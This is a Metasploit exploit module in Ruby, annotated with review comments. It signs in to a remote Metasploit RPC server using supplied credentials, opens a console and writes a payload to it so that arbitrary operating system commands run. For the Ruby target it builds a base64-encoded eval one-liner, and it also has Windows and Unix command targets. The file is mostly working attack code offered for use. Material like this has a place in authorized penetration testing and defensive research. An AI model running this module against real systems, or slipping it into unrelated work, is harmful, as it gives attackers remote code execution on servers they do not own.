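##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post-authentication command execution against a remote Metasploit RPC
# service: log in, open a console with 'console.create', and feed the payload
# to it with 'console.write'. Anything msfconsole does not recognise as one of
# its own commands is handed to the operating system shell, which is what
# turns console access into command execution.
#
# Valid RPC credentials are required; this is not an authentication bypass.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Metasploit RPC Console Command Execution',
        'Description' => %q{
          This module connects to a specified Metasploit RPC server and
          uses the 'console.write' procedure to execute operating
          system commands. Valid credentials are required to access the
          RPC interface.

          This module has been tested successfully on Metasploit 4.15
          on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
          4.14 on Windows 7 SP1.
        },
        'License' => MSF_LICENSE,
        'Author' => 'bcoles',
        'References' => [
          [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],
          [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]
        ],
        'Platform' => %w{ruby unix win},
        'Targets' => [
          [
            'Ruby', {
              'Arch' => ARCH_RUBY,
              'Platform' => 'ruby',
              # The Ruby payload is base64-wrapped in #payload_command, so only
              # NUL needs to be excluded here.
              'Payload' => { 'BadChars' => "\x00" }
            }
          ],
          [
            'Windows CMD', {
              'Arch' => ARCH_CMD,
              'Platform' => 'win',
              # CR/LF would terminate the console line early and split the
              # command, so they are excluded for the raw shell targets.
              'Payload' => { 'BadChars' => "\x00\x0A\x0D" }
            }
          ],
          [
            'Unix CMD', {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix',
              'Payload' => { 'BadChars' => "\x00\x0A\x0D" }
            }
          ]
        ],
        'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },
        'Privileged' => false,
        'DisclosureDate' => '2011-05-22',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options [
      Opt::RPORT(55552),
      OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),
      OptString.new('PASSWORD', [true, 'Password for the specified username', '']),
      # NOTE(review): whether Msf::RPC::Client verifies the server certificate
      # when SSL is enabled is not visible from this module -- confirm before
      # relying on this option to protect the credentials sent at login.
      OptBool.new('SSL', [ true, 'Use SSL', true])
    ]
  end

  # Submits +cmd+ to the console created in #exploit. The command is wrapped
  # in CRLF so msfconsole sees a complete input line.
  #
  # @param cmd [String] command text to write to the remote console
  # @param opts [Hash] unused; retained for interface compatibility
  # @return [void]
  # @raise via fail_with when the RPC call returns nil
  def execute_command(cmd, opts = {})
    res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"

    fail_with Failure::Unknown, 'Connection failed' if res.nil?

    # A successful write reports the byte count under 'wrote'; anything else
    # (typically an error hash) is shown verbatim to the operator.
    unless res['wrote'].to_s =~ /\A\d+\z/
      print_error "Could not write to console #{@console_id}:"
      print_line res.to_s
      return
    end

    vprint_good "Wrote #{res['wrote']} bytes to console"
  end

  # Connects and authenticates to the RPC service, reports the remote version,
  # creates a console and delivers the payload for the selected target.
  #
  # @raise via fail_with on connection, authentication, version-query or
  #   console-creation failure
  def exploit
    begin
      @rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl
    rescue Rex::ConnectionRefused
      fail_with Failure::Unreachable, 'Connection refused'
    rescue => e
      fail_with Failure::Unknown, "Connection failed: #{e}"
    end

    @rpc.login datastore['USERNAME'], datastore['PASSWORD']

    # The client only holds a token after a successful login.
    fail_with Failure::NoAccess, 'Authentication failed' if @rpc.token.nil?

    print_good 'Authenticated successfully'
    # The token is a bearer credential for this RPC session; it is only
    # printed in verbose mode, but be aware it lands in console output/logs.
    vprint_status "Received temporary token: #{@rpc.token}"

    version = @rpc.call 'core.version'

    # Bug fix: the original tested the stale login result here instead of
    # +version+, so a nil reply went on to raise NoMethodError below.
    fail_with Failure::Unknown, 'Connection failed' if version.nil?

    print_status "Metasploit #{version['version']}"
    print_status "Ruby #{version['ruby']}"
    print_status "API version #{version['api']}"

    vprint_status 'Creating new console...'
    res = @rpc.call 'console.create'

    fail_with Failure::Unknown, 'Connection failed' if res.nil?

    unless res['id'].to_s =~ /\A\d+\z/
      print_error 'Could not create console:'
      print_line res.to_s
      return
    end

    @console_id = res['id']
    print_good "Created console ##{@console_id}"

    print_status 'Sending payload...'
    execute_command payload_command
  end

  # Destroys the console created by #exploit (if one was created) and always
  # closes the RPC client. This runs after #exploit whether it returned or
  # raised, so neither @console_id nor @rpc may be assumed to be set.
  def cleanup
    return if @console_id.nil?

    vprint_status 'Removing console...'
    res = @rpc.call 'console.destroy', @console_id

    if res.nil?
      print_error 'Connection failed'
      return
    end

    unless res['result'].eql? 'success'
      print_warning "Could not destroy console ##{@console_id}:"
      print_line res.to_s
      return
    end

    vprint_good "Destroyed console ##{@console_id}"
  ensure
    # @rpc is nil when Msf::RPC::Client.new never succeeded (fail_with raises
    # before the assignment); an unconditional close would then raise
    # NoMethodError from inside cleanup and mask the real error.
    @rpc.close if @rpc
  end

  private

  # Builds the console input that delivers the payload for the selected
  # target platform.
  #
  # @return [String] command line to write to the remote console
  # @raise via fail_with when the target platform is not one of ruby/win/unix
  def payload_command
    case target['Platform']
    when 'ruby'
      # Base64 keeps the Ruby source free of quotes and newlines, so it can be
      # passed safely inside the single-quoted -e argument.
      "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"
    when 'win', 'unix'
      payload.encoded
    else
      fail_with Failure::NoTarget, 'Invalid target'
    end
  end
end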